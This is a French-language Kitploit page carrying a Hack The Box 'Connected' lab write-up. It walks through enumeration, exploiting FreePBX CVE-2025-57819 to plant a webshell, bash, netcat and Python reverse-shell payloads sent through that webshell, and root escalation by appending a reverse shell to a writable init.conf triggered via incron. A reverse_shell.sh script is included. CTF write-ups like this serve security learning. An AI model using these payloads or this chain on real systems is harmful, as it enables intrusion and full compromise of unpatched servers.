Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
htb-labs-connected — # Write-up de la machine Hack The Box Connected : énumération, exploitation de la CVE-2025-57819, reverse shell et élévation de privilèges vers root via FreePBX et incron. | Kitploit
Outils/GitHubGitHub/diegorivas1/htb-labs-connected
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationRétro-ingénierieExploitation d'Applications WebCollecte d'InformationsCTFTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Développement de Charges Utiles
GitHubdiegorivas1/htb-labs-connected

htb-labs-connected

# Write-up de la machine Hack The Box Connected : énumération, exploitation de la CVE-2025-57819, reverse shell et élévation de privilèges vers root via FreePBX et incron.

Voir le dépôt
il y a 18h 17mPas encore vérifié

HTB: Connected - Coup de Cœur de l'Équipe

English | Español

HTB Difficulty OS Platform

📋 Table des Matières

  1. Énumération
  2. Exploitation - CVE-2025-57819
  3. Reverse Shell
  4. Élévation de Privilèges
  5. Drapeaux
  6. Structure du Dépôt
  7. Scripts et Outils Utilisés
  8. Résumé de l'Attaque
  9. Ressources et Crédits
  10. Notes Supplémentaires

1. Énumération

1.1 Scan de Ports avec Nmap

root@kitploit:~
nmap -sV 10.129.81.130

Résultats :

root@kitploit:~
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.6 (CentOS) PHP/7.4.16
443/tcp open  ssl/https Apache/2.4.6 (CentOS) PHP/7.4.16

1.2 Ajouter le Domaine à /etc/hosts

root@kitploit:~
echo "10.129.81.130 connected.htb" >> /etc/hosts

1.3 Fuzzing de Répertoires avec Gobuster

root@kitploit:~
gobuster dir -u http://connected.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Découvertes clés :

  • /admin - Panneau d'administration FreePBX
  • /ucp - Panneau de Contrôle Utilisateur
  • /robots.txt - Fichier robots

2. Exploitation - CVE-2025-57819

2.1 Télécharger l'Exploit

Clonez le dépôt WatchTowr Labs :

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819.git
cd watchTowr-vs-FreePBX-CVE-2025-57819

2.2 Exécuter l'Exploit

root@kitploit:~
python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb

Sortie attendue :

root@kitploit:~
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=hostname

2.3 Vérifier la Webshell

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=whoami"

Résultat :

root@kitploit:~
asterisk

3. Reverse Shell

3.1 Démarrer un Écouteur sur Kali

root@kitploit:~
nc -lvnp 4444

3.2 Injecter le Reverse Shell

Version encodée :

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.234%2F4444%200%3E%261%27"

Remarque : Remplacez 10.10.14.234 par votre IP VPN.

3.3 Alternatives

Netcat

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=nc%20-e%20/bin/bash%2010.10.14.234%204444"

Python

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.14.234%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bsubprocess.call([%22/bin/bash%22%2C%22-i%22])%27"

3.4 Shell Obtenue

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 55944
bash: no job control in this shell
[asterisk@connected html]$

4. Élévation de Privilèges

4.1 Trouver les Fichiers de Configuration Accessibles en Écriture

root@kitploit:~
find /etc -name "*.conf" -writable 2>/dev/null

Résultat clé :

root@kitploit:~
/etc/dahdi/init.conf

4.2 Vérifier incron.d

root@kitploit:~
cat /etc/incron.d/*

Entrée pertinente :

root@kitploit:~
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart

4.3 Ajouter le Reverse Shell à init.conf

root@kitploit:~
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.234/4545 0>&1"' >> /etc/dahdi/init.conf

4.4 Démarrer l'Écouteur du Shell Root

root@kitploit:~
nc -lvnp 4545

4.5 Déclencher le Redémarrage du Service

root@kitploit:~
echo "Restart" >> /var/spool/asterisk/sysadmin/dahdi_restart

4.6 Shell Root Obtenu

root@kitploit:~
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 45996
bash: no job control in this shell
[root@connected /]#

4.7 Vérifier l'Accès Root

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

5. Drapeaux

5.1 Drapeau Utilisateur

root@kitploit:~
cat /home/asterisk/user.txt
root@kitploit:~
HTB{...user_flag...}

5.2 Drapeau Root

root@kitploit:~
cat /root/root.txt
root@kitploit:~
HTB{...root_flag...}

Les drapeaux sont volontairement omis de ce dépôt.


6. Structure du Dépôt

root@kitploit:~
htb-labs-connected/
├── README.md
├── README-ES.md
├── exploits/
│   ├── watchTowr-vs-FreePBX-CVE-2025-57819/
│   ├── CVE-2025-57819-exploit/
│   └── CVE-2025-57819-poc/
├── payloads/
│   └── reverse_shell.sh
├── scans/
│   ├── nmap_scan.txt
│   └── gobuster_results.txt
├── screenshots/
└── flags/

7. Scripts et Outils Utilisés

7.1 Script de Reverse Shell

Fichier : payloads/reverse_shell.sh

root@kitploit:~
#!/bin/bash

# Reverse shell for HTB Connected
# Usage: ./reverse_shell.sh 10.10.14.234 4444

IP=$1
PORT=$2

if [ -z "$IP" ] || [ -z "$PORT" ]; then
    echo "Usage: $0 <IP> <PORT>"
    exit 1
fi

bash -c "bash -i >& /dev/tcp/$IP/$PORT 0>&1"

7.2 Commandes d'Énumération

Fichier : scans/nmap_scan.txt

root@kitploit:~
# Full port scan
nmap -sV -p- -T4 10.129.81.130

# Service and default script scan
nmap -sC -sV -p22,80,443 10.129.81.130

7.3 Commandes de Fuzzing

Fichier : scans/gobuster_results.txt

root@kitploit:~
# Directory fuzzing
gobuster dir \
    -u http://connected.htb \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html

# Fuzzing the admin directory
gobuster dir \
    -u http://connected.htb/admin \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html,conf,ini,bak

8. Résumé de l'Attaque


9. Ressources et Crédits

  • Writeup Original : CyberSaif
  • Exploit WatchTowr Labs : GitHub
  • CVE-2025-57819 : SentinelOne
  • Avis de Sécurité FreePBX : GitHub

10. Notes Supplémentaires

10.1 Si la Webshell N'est Pas Créée

  • Attendez les deux minutes complètes ; l'exploit nécessite du temps pour créer l'artefact.
  • Vérifiez la connectivité :
root@kitploit:~
curl -k https://connected.htb

10.2 Si l'Écouteur Ne Fonctionne Pas

Vérifiez votre interface VPN :

root@kitploit:~
ip addr show tun0

Essayez un autre port d'écoute si nécessaire :

root@kitploit:~
4445
8080
1234

10.3 Fichiers Clés sur la Cible

  • /etc/dahdi/init.conf - Fichier de configuration accessible en écriture utilisé lors de l'élévation de privilèges
  • /etc/incron.d/ - Répertoire de configuration incron
  • /var/spool/asterisk/sysadmin/dahdi_restart - Déclencheur utilisé pour exécuter l'action de redémarrage
  • /var/www/html/ - Racine des documents du serveur web

🏁 Conclusion

Connected a été complété avec succès. ✅

La chaîne d'attaque démontre comment une instance FreePBX exposée peut mener à un accès initial via CVE-2025-57819, suivi d'une élévation de privilèges via un fichier de configuration accessible en écriture et un déclencheur basé sur incron.

Télécharger l’outil
ÉtapeActionRésultat
1NmapPorts 22, 80 et 443 ouverts
2Gobuster/admin, /ucp, /robots.txt découverts
3CVE-2025-57819Webshell en tant que asterisk
4Reverse ShellShell interactif en tant que asterisk
5Élévation de Privilègesincron.d → dahdi_restart → init.conf
6RootShell root obtenu